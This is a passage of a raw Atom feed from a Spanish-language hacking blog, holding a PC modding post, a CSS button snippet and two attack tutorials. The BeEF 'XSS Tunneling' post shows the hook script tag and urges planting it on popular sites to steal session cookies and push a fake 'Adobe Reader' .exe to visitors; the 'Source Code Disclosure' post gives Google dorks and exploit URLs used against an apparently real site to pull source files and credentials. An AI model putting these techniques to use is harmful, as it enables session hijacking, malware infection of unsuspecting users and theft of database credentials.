class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-3052359273949872119?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/3052359273949872119/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/06/creando-un-bot-msn-con-fines-de.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3052359273949872119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/3052359273949872119'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/06/creando-un-bot-msn-con-fines-de.html' title='Creando un [BOT MSN] Con fines de esparcir un Malware'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-10bf-JPmsic/TfQ8snzFj5I/AAAAAAAAACo/AlH45Vxj3ko/s72-c/2011-06-11_23-12-11.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-2839216087033512611</id><published>2011-06-02T18:04:00.000-07:00</published><updated>2011-06-02T18:04:55.822-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Personal'/><title type='text'>Mi pc modding [|||||||||||||||87%]</title><content type='html'>&lt;b&gt;Mi PC Modding&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;------------------------&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;Frontal&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://oi53.tinypic.com/2q9yvcm.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="320" width="240" src="http://oi53.tinypic.com/2q9yvcm.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;Posed&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://oi53.tinypic.com/15wasjp.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="240" width="320" src="http://oi53.tinypic.com/15wasjp.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;Interno&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i51.tinypic.com/fy37rd_th.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="120" width="160" src="http://i51.tinypic.com/fy37rd_th.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;i&gt;Características:&lt;/i&gt;&lt;br&gt;&lt;br&gt;&lt;br /&gt;Case Transparente&lt;br&gt;&lt;br&gt;&lt;br /&gt;AMD PHENOM II X4 Black Edition&lt;br&gt;&lt;br&gt;&lt;br /&gt;BOARD ASUS M4A79XTD EVO&lt;br&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;2 x 4 DDR3 Ram&lt;br&gt;&lt;br&gt;&lt;br /&gt;Nvidia Geforce Gtx 560ti 1024&lt;br&gt;&lt;br&gt;&lt;br /&gt;Sound Xtremegamer Creative Sku&lt;br&gt;&lt;br&gt;&lt;br /&gt;Fuente Real 800 W Mustiff&lt;br&gt;&lt;br&gt;&lt;br /&gt;Iluminacion catodos y Leds UV&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-2839216087033512611?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/2839216087033512611/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/06/mi-pc-modding-87.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2839216087033512611'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2839216087033512611'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/06/mi-pc-modding-87.html' title='Mi pc modding [|||||||||||||||87%]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i51.tinypic.com/fy37rd_th.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-1793823921278360960</id><published>2011-06-01T19:45:00.000-07:00</published><updated>2011-06-01T19:50:44.708-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tutoriales'/><title type='text'>XSS Tunneling [BeEF]</title><content type='html'>Hace mucho tiempo que Nuestro camarada MurdeR Hizo una charla sobre XSSTunneling con BeEF y los Logs se encuentran en... el Blog de &lt;font color="cyan"&gt;CE&lt;/font&gt;&lt;font color="orange"&gt;REAL&lt;/font&gt; sin Alargar tanto Hoy decido Crear una introduccion a dicha herramienta que es tan Buena :D que Permite La ejecucion de Java Applet Payload + exe :O&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;INICIEMOS&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Descargamos BeEF de Su pagina oficial&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;http://www.bindshell.net/tools/beef/&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2- Desempaquetamos.....&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i40.tinypic.com/6pb8z6.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="198" width="254" src="http://i40.tinypic.com/6pb8z6.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3-En un Hosting montamos los Archivos...Cuando acabemos vamos a la GUI&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i40.tinypic.com/noyhy9.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="500" src="http://i40.tinypic.com/noyhy9.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Una Vez Montado como saber si funka ¿?&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Simple Nos Ponemos en la GUI :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i40.tinypic.com/noyhy9.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="500" src="http://i40.tinypic.com/noyhy9.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y vamos al MENU VIEW Y ELEGIMOS LA 1 OPCION&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img694.imageshack.us/img694/7620/pantallazoby.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="500" src="http://img694.imageshack.us/img694/7620/pantallazoby.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Este Nos Brindara una ventana de EXAMPLE O PRUEBA si vemos q Al cabo de unos Segundos Conecta...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i44.tinypic.com/1607sas.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="329" width="622" src="http://i44.tinypic.com/1607sas.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quiere decir q Nuestro BeEF esta Listo :D!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;&lt;i&gt; &lt;b&gt;COMO USARLO¿?&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Bueno vamos al menu q Nombre anteriormente VIEW/Spawn Zombie Example&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nos saldra esta pag:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img202.imageshack.us/img202/2867/16h905ujpg.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="112" width="714" src="http://img202.imageshack.us/img202/2867/16h905ujpg.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dicho codigo es un ARCHIVO SCRIPT q se encuentra en los archivos que nosotros subimos  con el BEEF!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre class="brush :html"&gt;&amp;lt;script language='Javascript' src="http://          /beef/hook/beefmagic.js.php'&amp;gt;&amp;lt;/script&amp;gt;   &lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ese Code Hay q Meterlo en el Body de las Paginas.. Su funcion seria crear un Puente...Se preguntan en q Paginas¿?... en las que Quieran...!!! EJEMPLO!... si logran meter el SCRIPT CODE en alguna pagina con usuarios EJEMPLO: facebook.com XD podrias robar SESIONES COOKIES.. Ademas Podrias meterlo en varias webs FAMOSAS CON MUCHA SVISITAS y a los users los Rediriges a un EXE y asi Podrias tener un Malware Infeccion&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i44.tinypic.com/x2sc2f.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="298" width="746" src="http://i44.tinypic.com/x2sc2f.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;&lt;b&gt;Mentiendo el Code en un INDEX de un Hacked HOST!&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Este Code Hara una Simulacion de q la web esta Cargando... y A la vez Conecta al BEEF CLIENT&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i39.tinypic.com/rkvpr9.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="215" width="709" src="http://i39.tinypic.com/rkvpr9.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i40.tinypic.com/72zj4l.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="140" width="412" src="http://i40.tinypic.com/72zj4l.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En Nuestro Client BEEF Veriamos esto....&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i40.tinypic.com/r05qmb.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="332" width="603" src="http://i40.tinypic.com/r05qmb.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;1 ZOMBIE A CONECTADO :D&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Podriamos Robar Cookies&lt;br /&gt;&lt;br /&gt;Sacar IPS&lt;br /&gt;&lt;br /&gt;Enviar Alerts!&lt;br /&gt;&lt;br /&gt;Java Applet!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Entr otras Funciones.....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Enviando Alerts&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1- VISTA DESDE EL CLIENT MANAGER&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i41.tinypic.com/24wgdpl.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="307" width="692" src="http://i41.tinypic.com/24wgdpl.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2-VISTA DESDE LA WEB Q RECIBE&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img217.imageshack.us/img217/3027/rm91y8jpg.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="326" width="729" src="http://img217.imageshack.us/img217/3027/rm91y8jpg.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;Haciendo redireccion a Archivo Exe Mediante ING SOCIAL!&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;1-&lt;/b&gt; Enviamos AlerT al usuario con algo q haga descarga &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;EJEMPLO: "Para Ver la Pagina Necesita tener Adobe reader 3"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i41.tinypic.com/6901e1.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="362" width="789" src="http://i41.tinypic.com/6901e1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;br /&gt;&lt;br /&gt;El usuario dira Bueno lo Descargo de una....&lt;/u&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;2-&lt;/b&gt; Le hacemos un redirect a Un Archivo.exe Simulando ser el Adobe Reader 3&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;a-&lt;/b&gt; Vamos a NETWORK MODULES/ BROWSER REDIRECT&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img708.imageshack.us/img708/9133/pantallazo1w.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="500" src="http://img708.imageshack.us/img708/9133/pantallazo1w.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;b-&lt;/b&gt; Ingresamos el enlace con el .exe MALICIOSO&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i39.tinypic.com/2gufr0x.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="500" src="http://i39.tinypic.com/2gufr0x.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;c-&lt;/b&gt; Al abrirse el usuario creera q es el ADOBE q se le pidio anteriormente... y PFF&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://i42.tinypic.com/23kymqb.jpg" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="300" width="500" src="http://i42.tinypic.com/23kymqb.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-1793823921278360960?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/1793823921278360960/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/06/xss-tunneling-beef.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1793823921278360960'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/1793823921278360960'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/06/xss-tunneling-beef.html' title='XSS Tunneling [BeEF]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://i40.tinypic.com/6pb8z6_th.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-2479879459759033644</id><published>2011-06-01T19:30:00.000-07:00</published><updated>2011-08-15T11:36:17.071-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades'/><title type='text'>Conociendo la vuln [Source Code Disclosure]</title><content type='html'>Esta vulnerabilidad es provocada porque no descarga los archivos con seguridad, osea se fuerza a descargar x archivo, ya que x archivo puede ser cualquier archivo que se le indique via GET como lo usualmente, esto es parecido a local file include y se puede resolver de la misma manera, se le puede decir al code que descarge solo X archivo y se verifica comparando si X archivo es igual a X archivo de la peticion GET. [Definicion Yoya]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;*[filedowload.php?file=file4 &lt;br /&gt;*[filedowload.php?file=file5 ----- Estos estan en dicho servidor Si se encuentra el directorio se podria apreciar la lista&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;INDEX O DIRECTORIO DEL CUAL TOMA EL ARCHIVO FILE&lt;br /&gt;&lt;br /&gt;file 1&lt;br /&gt;file 2&lt;br /&gt;file 3&lt;br /&gt;file 4&lt;br /&gt;file 5&lt;br /&gt;&lt;br /&gt;.............&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Si no le es Secuencia seria asi&lt;br /&gt;&lt;br /&gt;*[filedowload.php?file=documentolegislacional.pdf&lt;br /&gt;y veriamos el directorio asi..[ALEATORIO]&lt;br /&gt;&lt;br /&gt;DIR INDEX&lt;br /&gt;&lt;pre class="brush :html"&gt;nominadeclausura.pdf&lt;br /&gt;legislacionprimera.doc&lt;br /&gt;documentolegislacional.pdf&lt;br /&gt;imagenposteconomica.jpg&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El Directorio Nos Muestra que se descarga de manera aleaotoria y sin orden alguno...&lt;br /&gt;pero si se es Secuencial o aleatoria No hay problema :D&lt;br /&gt;&lt;br /&gt;Ya que lo que necesitamos es que descargue de su propio servidor :D. y como vemos en los 2 directorios mostrados anteriormente Son del mismo server :O&lt;br /&gt;&lt;br /&gt;Momento De Explotar :D&lt;br /&gt;&lt;br /&gt;Ahora A explotar este BUG "inofensivo" lo que haremos no sera descargar los archivos en dicho directorio.. Si no buscar los archivos del sistema.. ya sea login.php ... admin.php fuera de estos directorios ya ea del CMS o NUKE o sistema de gestion para sacar un poco de info de coneccion de DBS [Bases de Datos] y lograr obtener Usuarios.. hash..Claves..Number Sings Entre mas...&lt;br /&gt;&lt;br /&gt;Para encontrar webs con dicho BUG usaremos algun d0rkde estos o la creamos&lt;br /&gt;&lt;pre class="brush :html"&gt;allinurl:filedownload.php&lt;br /&gt;allinurl:filesource.php&lt;br /&gt;allinurl:dowloadfile.php&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Entre Otras.. Que Podriamos sacar con imaginacion..&lt;br /&gt;Una ves Buscado en Google.. Saldrian las posibles webs vulnerables..&lt;br /&gt;&lt;br /&gt;En mi caso encontre esta&lt;br /&gt;&lt;pre class="brush :html"&gt;http://www.vulnerablescd.org.au/phplib/filedownload.php?file=/elib/lib/downloaded_files/publications/pdfs/phcris_pub_8108.pdf&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Despues de file= va /elib/lib/downloaded_files/publications/pdfs/phcris_pub_8108.pdf&lt;br /&gt;&lt;br /&gt;Este es un Directorio Q no es directo es llamado por dicho code&lt;br /&gt;Para probar noten q si es de la web&lt;br /&gt;&lt;pre class="brush :html"&gt;http://www.vulnerablescd.org/elib/lib/downloaded_files/publications/pdfs/phcris_pub_8108.pdf&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Pff Salio el mismo PDF :O&lt;br /&gt;&lt;br /&gt;Ahora ya sabemos y estamos 100% seguros Q la web descarga sus propios archivos...&lt;br /&gt;Con un Poco de Imaginacion buscaremos archivos q nos boten Info.. y saber usarla&lt;br /&gt;&lt;br /&gt;Buscaba y buscaba y no encontre nada :(&lt;br /&gt;&lt;br /&gt;Pero.. pff Viene la Imaginacion..Debo aclarar q esta Vulnerabilidad descarga el SOURCE Completamente :O&lt;br /&gt;Es decir q no es lo mismo q la Opcion Codigo de fuente...Ahora me enfocare en el index.php&lt;br /&gt;&lt;br /&gt;Para descargarlo hacemos esto..&lt;br /&gt;&lt;pre class="brush :html"&gt;http://www.vulnerablescd.org.au/phplib/filedownload.php?file=/index.php&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Una vez obtenido el code del Index.. procedemos a Explorar&lt;br /&gt;Nada :(&lt;br /&gt;&lt;br /&gt;pues Procedo a escanear con ACUNETIX haber si encuentro directorios q interesen..&lt;br /&gt;&lt;br /&gt;:o encontre un directorio q dice /dios/js/index.php&lt;br /&gt;&lt;br /&gt;Lo descargo...&lt;br /&gt;&lt;pre class="brush :html"&gt;http://www.vulnerablescd.org.au/phplib/filedownload.php?file=/dios/js/index.php&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Lo examino.. y :O Es un Simple PHP q me vota&lt;br /&gt;&lt;pre class="brush :php"&gt;$USER=&lt;br /&gt;$PASSWD=&lt;br /&gt;$VARIABLE=&lt;br /&gt;$DIR=&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;Mucha Info No ¿?.... Ahora Despues de obtener Los Datos Sabras q Hacer :D.. ESTO no quiere decir q el Index.php o algunos archivos no voten nada.. si no q en mi caso no me sirvio, el secreto de saber sacar info de un server es explorando directorios/ y exlorando SOURCES :P&lt;br /&gt;&lt;br /&gt;[LA DIRECCION DE LA WEB VULNERABLE HA SIDO CAMBIADA POR SEGURIDAD LOS DATOS PROPORCIONADOS POR EL .PHP HAN SIDO RESERVADOS]&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347676997303684143-2479879459759033644?l=maztor.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://maztor.blogspot.com/feeds/2479879459759033644/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://maztor.blogspot.com/2011/06/conociendo-la-vuln-source-code.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2479879459759033644'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347676997303684143/posts/default/2479879459759033644'/><link rel='alternate' type='text/html' href='http://maztor.blogspot.com/2011/06/conociendo-la-vuln-source-code.html' title='Conociendo la vuln [Source Code Disclosure]'/><author><name>Maztor</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/--ab16VcXKr0/TbdUkgcp8EI/AAAAAAAAAAM/6GRDHb-tQPY/s220/maztorsec2.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347676997303684143.post-1439652072521755958</id><published>2011-05-31T20:06:00.000-07:00</published><updated>2011-05-31T20:11:04.498-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='codes'/><title type='text'>Un pequeño "Follow Me" Elegante</title><content type='html'>&lt;b&gt;Debido a la salida del nuevo botton de "sigueme" que lanzo twitter decido ponerle un aspecto simple, minimalista y elegante con [CSS].&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Es un pequeño code que se los comparto, pueden usarlo en webs, blogs y demas.&lt;/b&gt; (No es nada del otro mundo)&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Pueden modificarle, Tamaño, Colores y efectos, todo al Gusto.&lt;/i&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;Screenshots previa&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.imagengratis.org/images/2011053121511.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="41" width="203" src="http://www.imagengratis.org/images/2011053121511.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-yWJmLXkN_fA/TeWqAPp4KEI/AAAAAAAAABw/cHJOsmZEdjo/s1600/2011-05-31_21-51-44.png" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="41" width="203" src="http://4.bp.blogspot.com/-yWJmLXkN_fA/TeWqAPp4KEI/AAAAAAAAABw/cHJOsmZEdjo/s320/2011-05-31_21-51-44.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 